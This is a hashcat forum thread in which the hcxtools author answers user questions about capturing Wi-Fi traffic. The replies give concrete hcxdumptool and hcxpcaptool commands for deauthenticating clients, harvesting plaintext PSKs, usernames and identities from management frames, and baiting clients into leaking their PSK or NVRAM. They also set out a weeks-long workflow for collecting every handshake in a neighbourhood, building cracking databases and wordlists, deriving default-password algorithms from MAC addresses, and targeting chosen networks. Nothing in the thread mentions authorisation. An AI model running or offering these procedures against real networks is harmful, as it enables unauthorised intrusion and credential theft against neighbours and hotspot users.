hcxtools - solution for capturing wlan traffic and conversion to hashcat formats
Quote:There are many, many clear passwords in the captured files

How does one find/extract these clear passwords (Example commands please!)? Do we need to enable a certain option for wlandump to capture these? What causes these to be sent in the first place; isn't wireless communication encrypted and only hashes are exchanged? thanks
Reply
What is the advantage of using (wlandump) -l switch with respect to password cracking? I don't enable it, am I missing something important?
Reply
Hi RashidMalik.
wlandump-ng -l and hcxdumptool -O enable capturing of IPv4 and IPv6 traffic (for example from hotspots).
For example all non EAP based authentications like:
-TLS authentications
-CHAP authentications
-TACACS+ authentication (https://hashcat.net/forum/thread-7062.html)

It isn't enabled by default, because this cap files can grow very big (very fast).

Passwords (PSK), usernames and identities are captured by default. You can retrieve them using hcxdumptool -E -U -I options. Unfortunately we can't decide between ESSIDs and PSKs. So you find both of them in -E option file.

The more clients you receive, the more PSKs, usernames and/or identities you will get.
APs doesn't send PSKs, usernames and/or identities!

wlandump-ng and wlancap2hcx are outdated. I kept them only for backward compatibility (libpcap).
hcxdumptool and hcxpcaptool are the successors.
Reply
Hello ZerBea
Really appreciate your posts. They are full of gems and I am going through all your posts gathering those gems. Thanks for all the time you (and your great team) put into writing these posts (making them understandable to newbies like me and also in creating/updating the awesome hcx tools.

Q1 What is the difference between these two tools "wlancap2hcx" and "hcxpcaptool"? They seem to have some common functionality? Which one is suitable for which purpose?

Q2 I have switched to hcxdumptool (from wlandump-ng) as you had stated that the later was now outdated. I have been now using hcxdumptool for about two days and it seems that wlandump tool used to catch more handshakes. Is it possible that wlandump works better on some platforms (I am on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali) linux (4.15.0-kali3-amd64)), maybe because it communicates with the system drivers? (Comands used
wlandump-ng -i wlan1mon -o 13052018-1031am.cap -R -U -s
hcxdumptool -i wlan1mon -o 14052018-1115am.cap -D -t 15 -s -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14 )

Q3 Which linux distribution do you suggest is best for working with hashcat? My laptop has intel corei5 processor and intel graphics card. I can't use my processor with hasccat due to CLI issues; graphics card works (but then only with --force option) but then whole system seems to come to a crawl, cant do anything else especially with browsers?
Reply
Hi RashidMalik.
Nice to hear that.
Q1 What is the difference between these two tools "wlancap2hcx" and "hcxpcaptool"? They seem to have some common functionality? Which one is suitable for which purpose?
It's nearly the same like the difference between wlandump-ng and hcxdumptool:
- wlancap2hcx uses libpcap, hcxpacptool doesn't use it.
- hcxpcaptool supports more formats than wlancap2hcx and the detection of handshakes is much, much better.
 (broken ESSIDs, no ESSIDs, broken handshakes...)
- hcxpcaptool has some additional functions
 (for example -O to convert all handshakes to hccapx - usefull if an unauthorized client tries some passwords)
- hcxpcaptool is the tool for conversion cap, pcap, pcap-ng, cap.gz to hccapx on wpa-sec
- it will replace wlancap2hcx

Q2 I have switched to hcxdumptool (from wlandump-ng) as you had stated that the later was now outdated.
I have been now using hcxdumptool for about two days and it seems that wlandump tool used to catch more handshakes.
Definitely no. In your case:
hcxdumptool -i wlan1mon -o 14052018-1115am.cap -D -t 15 -s -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14
you disabled attacks against existing connections (-D : do not transmit deauthentications or disassociations)
So you will get only handshakes from AP-less attacks.
Also you can improve your scanlist. Just do a wlanrcascan to see what channels are used in your area (for example 1,6,11). Then create your scanlist: 1,6,11,2,1,6,11,3,1,6,11,4,1,6,11,5,1,6,11,7,1,6,11,8,1,6,11,9,1,6,11,10,1,6,11, 12,1,6,11,13,1,6,11,14,1,6,11
so your commandline could look like this:
hcxdumptool -i wlan1mon -o 14052018-1115am.cap -t 15 -c 1,6,11,2,1,6,11,3,1,6,11,4,1,6,11,5,1,6,11,7,1,6,11,8,1,6,11,9,1,6,11,10,1,6,11, 12,1,6,11,13,1,6,11,14,1,6,11 -s
if you captured enough/all handshakes from APs in your area you can move to:
hcxdumptool -i wlan1mon -o 14052018-1115am.cap -t 15 -c 2,4,6,8,10,12 -s
to attack only new clients on less used channels.

Is it possible that wlandump works better on some platforms (I am on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali)) linux (4.15.0-kali3-amd64)), maybe because it communicates with the system drivers?
Definitely yes - a reason, why I didn't remove it, yet.

Q3 Which linux distribution do you suggest is best for working with hashcat?
That is hard to answer. The recommended distribution is UBUNTU. You get help here in the forum and you can read everything about the installation on the wiki pages.
I prefer arch LINUX. It's not easy to install and even less easy to configure. arch LINUX isn't beginner-friendly.
But ask yourself: I would like to build a cracking system.
-do I need a multimedia distribution?
-do I need an oversized environment (like KDE, Gnome, UNITY) or is LXQT, XFCE better for me?
-do I need all the services started by default (like pulseaudio, networkmanager, wpa-supplicant, and more....)
For example UBUNTU:
https://askubuntu.com/questions/702209/h...untu-15-10
and arch:
systemctl enable acpid.service
systemctl enable avahi-daemon.service
systemctl enable org.cups.cupsd.service
systemctl enable cronie.service
systemctl enable ntpd.service
(no unnecessary services, only what I decided to start)

You can read more here:
https://wiki.archlinux.org/index.php/arc...tributions
Reply
Oh, I noticed, that I didn't answer your first question:
How does one find/extract these clear passwords (Example commands please!)? Do we need to enable a certain option for wlandump to capture these? What causes these to be sent in the first place; isn't wireless communication encrypted and only hashes are exchanged? thanks

Finding PSKs is easy. But you have to develop a sight for that.
PSKs can be found in proberequests, identity responses and authentication frames (usernames).
A detailed tutorial is here: https://hashcat.net/forum/thread-6661-po...l#pid35891
including a test cap: https://hashcat.net/forum/attachment.php?aid=512
command to save them:
hcxpcaptool -o test.hccapx -E probes -I identities -U usernames *.cap

What causes these to be sent in the first place?
A damaged wpa-supplicant.conf of the client.
We can annoy a client in such a way, that he sends us his PSK and/or complete NVRAM.

Isn't wireless communication encrypted and only hashes are exchanged?
Yes, but that (managament) frames are unencrypted.
Reply
(08-18-2017, 01:15 PM)ZerBea Wrote: weak point analyse (2)

Take a look into hashcat.pot.2500 and search for networks
using simliar default passwords.

Try to figure out how the algo is calculated.
pwhash will help you on hash calculated algos

example:
If you think the algo uses the mac and the keyspace is ABCDEFGHIJKLMNOPQRSTUVWXYZ
and you have two mac_ap and 2 passwords

mac_ap: 001122334455 password: JMNADJAT
mac_ap: AABBCCDDEEFF password: WVRNVEJJ


pwhash 001122334455 ABCDEFGHIJKLMNOPQRSTUWVXYZ
...
md5-hex.......: 572e74cdf761d0e4038509919cd8af1a
md5-base64....: Vy50zfdh0OQDhQmRnNivGg==
md5-ascii.....: JUMXNTAUDDJPAITA
...

pwhash AABBCCDDEEFF ABCDEFGHIJKLMNOPQRSTUWVXYZ
...
md5-hex.......: 7d6d7ec9459bdd10988abaf6bfa5232f
md5-base64....: fW1+yUWb3RCYirr2v6UjLw==
md5-ascii.....: WFVTRZNQVIEMJJJW
...

password1: JMNADJAT
password2: WVRNVEJJ

md5-ascii.....: JUMXNTAUDDJPAITA
md5-ascii.....: WFVTRZNQVIEMJJJW

Congratulations, you found the default algo.

Where can I find this pwhash? Google search turned up a lots of variants. Which one exactly are you using? Its not installed on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali) by default and I could not locate it on the repository?
Reply
Hi RashidMalik.
This tool (and some others ) is located on GitHub (https://github.com/ZerBea):
https://github.com/ZerBea/hcxkeys
Reply
lets say I run hcxdumptool (aggressively) on a one hour timer, after one hour I hard close hcxdumptool. Then I start hcxdumptool for another hour capture. I am left with two cap files, hour1.cap and hour2.cap. I did not move location so a large chunk of handshakes are from the same clients/AP. Quite a bit of overlap.

My goal is one hccapx without dupes for that day, should I:

Method 1
1. hcxpcaptool -o allday.hccapx hour1.cap hour2.cap

Method 2
1. cat hour1.cap hour2.cap > full.cap
2. hcxpcaptool -o allday.hccapx full.cap

Method 3
1. wlancap2hcx -p full.cap hour1.cap hour2.cap
2. hcxpcaptool -o allday.hccapx full.cap

I am currently using method 3, but I would like to use method 1. Does hcxpcaptool -o combine and compare all caps for the "best" handshakes?
Reply
Hi taxil.
Neither method1 nor method 2 nor method 3.
First some words about the basic rationale behind hcxtools:
-hcxtools are analysis tools
-what we did not record is gone forever

1) get all handshakes from established connections in your neigbourhood
hcxdumptool -i interface -o record.pcap -t 5 -b blacklisthome

2) if you got all, focus on (new) clients (longterm - weeks!)
hcxdumptool -i interface -o record.pcap -t 60 -D -b blacklisthome

3) do the conversation
hcxpcaptool -o new.hccapx -E probelist -I identitylist -U usernamelist -P pmklist *.pcap
(if a wpa encrypted hotspot is in range, additionally use -O newall.hccapx to retrieve also connect attemps)

4) add all this raw data to your databases
cat new.hccapx >> database_best.hccapx
cat new.hccapx newall.hccapx >> database_all.hccapx
cat probelist >> databaseprobelist
cat identitylist >> databaseidentitylist
cat usernamelist >> databaseusernamelist
cat pmklist >> databasepmklist
cat database*list > workinglist (and sort this list uniq)
run workinglist against your database_best and use --potfile option of hashcat
create pmklist from hashcat.2500 potfile
cat pmklist >> databasepmklist
from now on, you can run pmklist in combination with --remove against your database and(or incomming to remove allready cracked ones in a very fast way.

Now put your focus on common ESSIDs and get them:
wlanhcx2ssid -i database_xxx.hccapx -X default (you can do this on best and/or raw)
In this case you get full advantage of reuse PBKDF2 on default.hccapx for common ESSIDs

If you need a single ESSID:
wlanhcx2ssid -i database_best.hccapx -w forced.hccapx

Retrieve info about converted networks:
wlanhcxinfo -i forced.hccapx -a -s -e | sort | uniq

and get exact the network you like to attack by mac or ESSID or whatever you like:
wlanhcx2ssid -i forced.hccapx -A mac_ap

Do not try to run useless wordlists found in www (and most of them are useless for your purpose)
Analyze your potfile to get informations about the keyspace of similar networks (same VENDOR and/or ISP)
Use -O option of hcxpcaptool (maybe a clients made a typo - half PSK, you are able to crack)
Analyze probelist (myabe PSK or simlilar PSK is inside)
Build your own wordlist based on your database lists and run rules on them
cat database lists and cracked to one list and run princeattack
Annoy the client to retrieve his NVRAM and or PSK - longterm: hcxdumptool -i interface -o record.pcap -t 60 -D -b blacklisthome
(that is not the same like a "normal" rogue AP or an evil twin - we are on protocol level)

This procedure will work:
for example https://wpa-sec.stanev.org/?stats
Last 24h processed handshakes: 15760
Last 24h performance: 176.23K/s
Last 24h submissions: 288
Last 24h founds: 231
Reply